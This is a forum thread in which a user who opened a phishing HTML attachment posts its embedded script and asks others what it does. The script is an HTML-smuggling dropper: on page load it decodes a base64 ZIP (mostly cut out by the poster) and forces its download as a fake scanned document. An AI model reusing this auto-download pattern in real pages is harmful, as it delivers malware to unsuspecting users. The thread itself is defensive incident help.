What is this JavaScript trying to do?

Question

UnabashedGeek 15 Newbie Poster

1 Year Ago

Stupidly, I clicked on an email attachment with an htlm extension to see what the scam was. I think I was expecting it to open in a text editor, but it ran. (Dumb, dumb, dumb!) Anyway, I've paid my dues by restoring over a terabyte of backup onto two disks. My question is, can someone far more expert than I am in javascript interpret what the embedded script does, in general terms. (Not what the embedded malware does.) Before anyone panics, I've cut some 600,000 characters out of the text variable so it isn't a danger. (I've also changed the extension from html to txt.)

I think the text var in the script is a representation of the contents of a zip file, and the script changes the text to an actual file and saves it. I'm bit unclear whether the script also tries to run the zipped file. I'd like to remove any lingering doubts as to anything bad that might have happened before I unplugged the ethernet cable. I never saw any evidence of a file being unzipped, or indeed of the zip file itself.

Any information on what the script was doing would be most welcome. Thanks!

javascript

5 Contributors
9 Replies
143 Views
2 Months Discussion Span
Latest Post 1 Year Ago Latest Post by Dkevinjames

All 9 Replies

rproffitt 2,565 "Nothing to see here."

1 Year Ago

Hmm, nothing there/here. What does https://www.hybrid-analysis.com report?

Dani 4,084 The Queen of DaniWeb

1 Year Ago

It doesn't look like you've attached the file. Please attach it as a .txt file. (Other file formats might be rejected by our system).

rproffitt 2,565 "Nothing to see here."

1 Year Ago

What little I could decode was it would create a PDF but that's as far as I got. It could do more but I don't have the 600K file and it's not work I do. I leave such to places like online scanners and r/Malware.

UnabashedGeek commented: Thanks for the additional info. I appreciate it. +2

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

jwenting 1,889 duckman Team Colleague · Answer 1 · 2022-06-12T03:49:09+00:00

better yet, copy/paste the code into a code block.
I for one (and hopefully everyone) won't open attachments...

Dani 4,084 The Queen of DaniWeb Administrator Featured Poster Premium Member · Answer 2 · 2022-06-12T04:23:48+00:00

Jwenting,

If he attaches a txt file, our system will automatically display its contents inline in a safe way :)

UnabashedGeek 15 Newbie Poster · Answer 3 · 2022-06-16T01:02:27+00:00

OK, it looks like it doesn't like my attachment, even though it was a .txt file. The message that says it's not happy with the file only appears when I hover, and I thought the big "X" over my attachment was in case I wanted to delete it. Sorry. Here it is as an in-line block.

<!doctype html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>Document download</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>

<div>
    <h1>Download completed</h1>
    <p>The document was successfully downloaded.</p>
</div>


<script type="text/javascript">
var text = "UEsDBBQAAgAIAF2GyFQJ3tgE/mMHAAAAIAAcAH0AU2Nhbm5lZERvY3VtZW50c185NzIwNDgxLmltZ1NEaACsAAAAAAgAr2fodWNkYGkRYWBgMGCAAB8gZmQFM1lFgURJc2zB6aOeMt9j77K+ZMYtx8jEwMDEkMDAApIVkGD4zyjPABIDqVUAEgogtoAIRJwRIi4EVbuSQQhFrSJU7X5GYbhabiABAFVUDQAHQamgYj+qoGJBqaBi7NsLfBTlvfDx2d1JsoTFBLkLyKoLCrFKiMoloAsJEShiJOEO2mjCnYST7AKtIIlLTpmMUezFeo62r1TxaFt9qW1PqfXUkOVqUSlaiKZeCtVOXC95BSEQJO//mZ0NAeqxrb14jr8vn+wzO5dnnueZZ57/M7OqaQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQBs3fuzQTBftAADAF8mUgqlDhxH/AQD4Qink+R8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgE/j0txauXx++fxml7/ 645469 bytes deleted/   UEsBAh4AFAACAAgAXYbIVAne2AT+YwcAAAAgABwAEQAAAAAAAAAgAAAAAAAAAFNjYW5uZWREb2N1bWVudHNfOTcyMDQ4MS5pbWdTRAQArAAAAFVUBQAHQamgYlBLBQYAAAAAAQABAFsAAAC1ZAcAAAA=";

function b64toBlob (b64Data, contentType, sliceSize) {
  var byteArrays = [];
  var byteCharacters = atob(b64Data);

  for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
    var slice = byteCharacters.slice(offset, offset + sliceSize);

    var byteNumbers = new Array(slice.length);
    for (var i = 0; i < slice.length; i++) {
      byteNumbers[i] = slice.charCodeAt(i);
    }

    var byteArray = new Uint8Array(byteNumbers);
    byteArrays.push(byteArray);
  }

  var blob = new Blob(byteArrays, {type: contentType});
  return blob;
}

var blob = b64toBlob(text,'application/zip', 512);
if (window.navigator.msSaveOrOpenBlob) {
    window.navigator.msSaveOrOpenBlob(blob, "ScannedDocuments_9720481.zip");
} else {
    var url = URL.createObjectURL(blob);
    var a = document.createElement("a");
    a.href = url;
    a.download = "ScannedDocuments_9720481.zip";
    document.body.appendChild(a);
    a.click();
    setTimeout(function() {
        document.body.removeChild(a);
        window.URL.revokeObjectURL(url);
    },0);
}



</script>   

</body>
</html>

Also I tried the hybrid analysis site, and if I understood the results correctly, it said it was malicious, but didn't say what it would do, what actions I might have observed, which is what I'm primarily concerned with. For instance, if it tried to open a zip file, the default for me would be win-zip and I would have seen it open, which I did not.

rproffitt 2,565 "Nothing to see here." Moderator · Answer 4 · 2022-06-16T01:48:10+00:00

It looks like malware to me. But the real code looks to be in that 600K of characters. Decoding that is something I'd pass on to r/malware but first read their rules at https://www.reddit.com/r/Malware/comments/4ap1a7/please_view_before_posting_on_rmalware/

Did it damage your files? What did it do?

UnabashedGeek 15 Newbie Poster · Answer 5 · 2022-06-23T01:06:06+00:00

Robert. Thank you. I'm not sure that it did anything. That's why I was asking for help in interpreting the javascript. I don't expect anyone to interpret the 600K file, which is probably an executable anyway, but I'd love to know if the javascript actually tried to "execute" the file it appears to be creating or if it just was hoping I would unzip it. I never saw anything besides the "Download completed" message. I never saw any sign of a zip file being unzipped. (I disconnected my PC from my network almost immediately and after a few days bit the bullet and restored my entire system from a backup prior to the incident. Possibly a bit over the top, but it let me get on with life.) My question here was intended to remove any last doubts.

Do you think the javascript would have actuated the malicious code, or just created it?

Dkevinjames 0 Newbie Poster · Answer 6 · 2022-08-26T13:50:08+00:00

In JavaScript, the this keyword refers to an object. Which object depends on how this is being invoked (used or called). The this keyword refers to different objects depending on how it is used: In an object method, this refers to the object.

What is this JavaScript trying to do?

Recommended Answers Collapse Answers

All 9 Replies

Recommended Answers